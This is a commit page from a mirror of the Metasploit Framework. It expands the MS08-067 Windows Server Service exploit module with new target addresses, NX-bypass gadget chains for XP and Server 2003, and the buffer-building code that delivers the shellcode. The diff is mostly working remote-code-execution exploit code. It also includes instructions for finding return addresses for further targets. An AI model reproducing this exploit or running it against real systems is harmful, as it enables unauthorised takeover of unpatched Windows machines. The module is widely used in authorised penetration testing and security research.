infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Lots of new targets merged in for MS08-067 including Brett Moore's 2003 SP2 DEP bypass 

git-svn-id: file:///home/svn/framework3/trunk@5812 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2008-10-31 05:16:02 +00:00
parent 08d296240a
commit 7fcf5b3dc2
1 changed files with 187 additions and 45 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

232
modules/exploits/windows/smb/ms08_067_netapi.rb
View File

@ -26,16 +26,17 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{ 'Description' => %q{
This module exploits a parsing flaw in the path canonicalization code of This module exploits a parsing flaw in the path canonicalization code of
NetAPI32.dll through the Server Service. This module is capable of bypassing NetAPI32.dll through the Server Service. This module is capable of bypassing
DEP on some operating systems and service packs. The correct target must be NX on some operating systems and service packs. The correct target must be
used to prevent the Server Service (along with a dozen others in the same used to prevent the Server Service (along with a dozen others in the same
process) from crashing. Windows XP targets seem to handle multiple successful process) from crashing. Windows XP targets seem to handle multiple successful
exploitation events, but 2003 targets will often crash or hang on subsequent exploitation events, but 2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module, full support for attempts. This is just the first version of this module, full support for
DEP bypass on 2003, along with other platforms, is still in development. NX bypass on 2003, along with other platforms, is still in development.
}, },
'Author' => 'Author' =>
[ [
'hdm' # with tons of input/help/testing from the community 'hdm', # with tons of input/help/testing from the community
'Brett Moore <brett.moore[at]insomniasec.com>'
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision$', 'Version' => '$Revision$',
@ -60,44 +61,128 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Windows XP SP2 English (DEP)',
#
# Antoine's universal for Windows 2000 with MS06-040 applied
# Use ms06_040_netapi for systems without this patch.
#
[ 'Windows 2000 MS06-040+ (YMMV pre MS06-040)',
{
'Ret' => 0x001f1cb0,
'Scratch' => 0x00020408,
}
], # JMP EDI Windows 2000 Universal
#
# Metasploit's NX bypass for XP SP2/SP3
#
[ 'Windows XP SP2 English (NX)',
{ {
'Ret' => 0x6f88f727, 'Ret' => 0x6f88f727,
'DisableNX' => 0x6F8916E2, 'DisableNX' => 0x6F8916E2,
'Scratch' => 0x00020408, 'Scratch' => 0x00020408,
} }
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 English (DEP)', #
# Metasploit's NX bypass for XP SP2/SP3
# Target provided by Giorgio Casali <giorgio.casali[at]gmail.com>
#
[ 'Windows XP SP2 Italian (NX)',
{
'Ret' => 0x596bf727,
'DisableNX' => 0x596c16e2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Metasploit's NX bypass for XP SP2/SP3
# Target provided by Ulises2k <ulises2k[at]gmail.com>
#
[ 'Windows XP SP2 Spanish (NX)',
{
'Ret' => 0x6fdbf807,
'DisableNX' => 0x6fdc17c2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Metasploit's NX bypass for XP SP2/SP3
# Target provided by sunwear <shellcoder[at]hotmail.com>
#
[ 'Windows XP SP2 Chinese (NX)',
{
'Ret' => 0x58fcda43,
'DisableNX' => 0x58fc16e2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Metasploit's NX bypass for XP SP2/SP3
#
[ 'Windows XP SP3 English (NX)',
{ {
'Ret' => 0x6f88f807, 'Ret' => 0x6f88f807,
'DisableNX' => 0x6F8917C2, 'DisableNX' => 0x6F8917C2,
'Scratch' => 0x00020408, 'Scratch' => 0x00020408,
} }
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows 2003 SP0 English (NO DEP)', #
# Metasploit's NX bypass for XP SP2/SP3
# Target provided by Thierry Zoller <Thierry[at]zoller.lu>
#
[ 'Windows XP SP3 German (NX)',
{
'Ret' => 0x6fda2bef,
'DisableNX' => 0x6fda17c2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Standard return-to-ESI without NX bypass
#
[ 'Windows 2003 SP0 English (NO NX)',
{ {
'Ret' => 0x71bf175f, 'Ret' => 0x71bf175f,
'Scratch' => 0x00020408, 'Scratch' => 0x00020408,
} }
], # JMP ESI WS2HELP.DLL ], # JMP ESI WS2HELP.DLL
[ 'Windows 2003 SP2 English (NO DEP)',
#
# Standard return-to-ESI without NX bypass
#
[ 'Windows 2003 SP2 English (NO NX)',
{ {
'Ret' => 0x71bf3969, 'Ret' => 0x71bf3969,
'Scratch' => 0x00020408, 'Scratch' => 0x00020408,
} }
], # JMP ESI WS2HELP.DLL ], # JMP ESI WS2HELP.DLL
#
# Brett Moore's crafty NX bypass for 2003 SP2
#
[ 'Windows 2003 SP2 English (NX)',
{
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
]
# #
# Missing Targets # Missing Targets
# Key: T=TODO ?=UNKNOWN U=UNRELIABLE # Key: T=TODO ?=UNKNOWN U=UNRELIABLE
# #
# [T] Windows 2000 SP4 - Could not trigger with this vector (need a different call)
# [?] Windows XP SP0 - Could not trigger with this vector # [?] Windows XP SP0 - Could not trigger with this vector
# [?] Windows XP SP1 - Could not trigger with this vector # [?] Windows XP SP1 - Could not trigger with this vector
# [?] Windows 2003 SP1 - Could not trigger with this vector # [?] Windows 2003 SP1 - Could not trigger with this vector
# [T] Windows 2003 SP2 - Triggered but bypassing DEP requires more time
# [?] Windows Vista SP0 - Not tested yet # [?] Windows Vista SP0 - Not tested yet
# [?] Windows Vista SP1 - Not tested yet # [?] Windows Vista SP1 - Not tested yet
# #
@ -119,16 +204,16 @@ class Metasploit3 < Msf::Exploit::Remote
*** WINDOWS XP SP2/SP3 TARGETS *** *** WINDOWS XP SP2/SP3 TARGETS ***
This exploit bypasses DEP/NX by returning to a function call inside acgenral.dll that disables NX This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX
for the process and then returns back to a call ESI instruction. These addresses are different for the process and then returns back to a call ESI instruction. These addresses are different
between operating systems, service packs, and language packs, but the steps below can be used to between operating systems, service packs, and language packs, but the steps below can be used to
add new targets. add new targets.
If the target system does not have NX/DEP, just place a "call ESI" return into both the Ret and If the target system does not have NX/NX, just place a "call ESI" return into both the Ret and
DisableNX elements of the target hash. DisableNX elements of the target hash.
If the target system does have NX/DEP, obtain a copy of the acgenral.dll from that system. If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.
First obtain the value for the Ret element of the hash with the following command: First obtain the value for the Ret element of the hash with the following command:
$ msfpescan -j esi acgenral.dll $ msfpescan -j esi acgenral.dll
@ -154,12 +239,12 @@ class Metasploit3 < Msf::Exploit::Remote
call ds:__imp__NtSetInformationProcess@16 call ds:__imp__NtSetInformationProcess@16
*** WINDOWS XP/2000 NON-DEP TARGETS *** *** WINDOWS XP NON-NX TARGETS ***
Instead of bypassing DEP, just return directly to a "JMP ESI", which takes us to the short Instead of bypassing NX, just return directly to a "JMP ESI", which takes us to the short
jump, and finally the shellcode. XP SP0 and XP SP1 may require a different opnum to get jump, and finally the shellcode. XP SP0 and XP SP1 may require a different opnum to get
reliable code execution. reliable code execution. O
*** WINDOWS 2003 SP2 TARGETS *** *** WINDOWS 2003 SP2 TARGETS ***
@ -175,12 +260,14 @@ class Metasploit3 < Msf::Exploit::Remote
*** WINDOWS 2000 TARGETS *** *** WINDOWS 2000 TARGETS ***
Currently untested, but should be reliable using opnum 0x23 (ala EMM / ph4ntom) No NX to bypass, just return directly to a "JMP EDX", which takes us to the short
jump, and finally the shellcode. Systems without MS06-040 applied act differently
and should not be targeted with this exploit.
*** WINDOWS VISTA TARGETS *** *** WINDOWS VISTA TARGETS ***
Currently untested, will involve ASLR and DEP, should be fun. Currently untested, will involve ASLR and NX, should be fun.
*** NetprPathCanonicalize IDL *** *** NetprPathCanonicalize IDL ***
@ -219,40 +306,95 @@ class Metasploit3 < Msf::Exploit::Remote
end end
prefix = "\\" prefix = "\\"
path = ""
server = Rex::Text.rand_text_alpha(rand(8)+1).upcase server = Rex::Text.rand_text_alpha(rand(8)+1).upcase
jumper = Rex::Text.rand_text_alpha(70).upcase
jumper[ 4,4] = [target.ret].pack("V") #
jumper[56,2] = make_nops(2) # Windows 2000, XP (NX), and 2003 (NO NX) targets
jumper[58,2] = "\xeb\x62" #
if(not target['RetDec'])
path = jumper = Rex::Text.rand_text_alpha(70).upcase
Rex::Text.to_unicode("\\") + jumper[ 4,4] = [target.ret].pack("V")
jumper[56,2] = make_nops(2)
jumper[58,2] = "\xeb\x62"
# This buffer is removed from the front path =
Rex::Text.rand_text_alpha(100) + Rex::Text.to_unicode("\\") +
# Shellcode # This buffer is removed from the front
payload.encoded + Rex::Text.rand_text_alpha(100) +
# Relative path to trigger the bug # Shellcode
Rex::Text.to_unicode("\\..\\..\\") + payload.encoded +
# Extra padding # Relative path to trigger the bug
Rex::Text.to_unicode(pad) + Rex::Text.to_unicode("\\..\\..\\") +
# Writable memory location (static) # Extra padding
[target['Scratch']].pack("V") + # EBP Rex::Text.to_unicode(pad) +
# Return to code which disables NX (or just the return) # Writable memory location (static)
[ target['DisableNX'] || target.ret ].pack("V") + [target['Scratch']].pack("V") + # EBP
# Padding with embedded jump # Return to code which disables NX (or just the return)
jumper + [ target['DisableNX'] || target.ret ].pack("V") +
# NULL termination # Padding with embedded jump
"\x00" * 2 jumper +
# NULL termination
"\x00" * 2
#
# Windows 2003 SP2 (NX) targets
#
else
jumper = Rex::Text.rand_text_alpha(70).upcase
jumper[ 0,4] = [target['RetDec']].pack("V")# one more to Align and make room
jumper[ 4,4] = [target['RetDec']].pack("V") # 4 more for space
jumper[ 8,4] = [target['RetDec']].pack("V")
jumper[ 12,4] = [target['RetDec']].pack("V")
jumper[ 16,4] = [target['RetDec']].pack("V")
jumper[ 20,4] = [target['RetPop']].pack("V")# pop to EBP
jumper[ 24,4] = [target['DisableNX']].pack("V")
jumper[ 56,4] = [target['JmpESP']].pack("V")
jumper[ 60,4] = [target['JmpESP']].pack("V")
jumper[ 64,2] = "\xeb\x02" # our jump
jumper[ 68,2] = "\xeb\x62" # original
path =
Rex::Text.to_unicode("\\") +
# This buffer is removed from the front
Rex::Text.rand_text_alpha(100) +
# Shellcode
payload.encoded +
# Relative path to trigger the bug
Rex::Text.to_unicode("\\..\\..\\") +
# Extra padding
Rex::Text.to_unicode(pad) +
# Writable memory location (static)
[target['Scratch']].pack("V") + # EBP
# Return to code which disables NX (or just the return)
[target['RetDec']].pack("V") +
# Padding with embedded jump
jumper +
# NULL termination
"\x00" * 2
end
handle = dcerpc_handle( handle = dcerpc_handle(
'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
@ -267,7 +409,7 @@ class Metasploit3 < Msf::Exploit::Remote
NDR.uwstring(server) + NDR.uwstring(server) +
NDR.UnicodeConformantVaryingStringPreBuilt(path) + NDR.UnicodeConformantVaryingStringPreBuilt(path) +
NDR.long(rand(1024)) + NDR.long(rand(1024)) +
NDR.wstring("") + NDR.wstring(prefix) +
NDR.long(4097) + NDR.long(4097) +
NDR.long(0) NDR.long(0)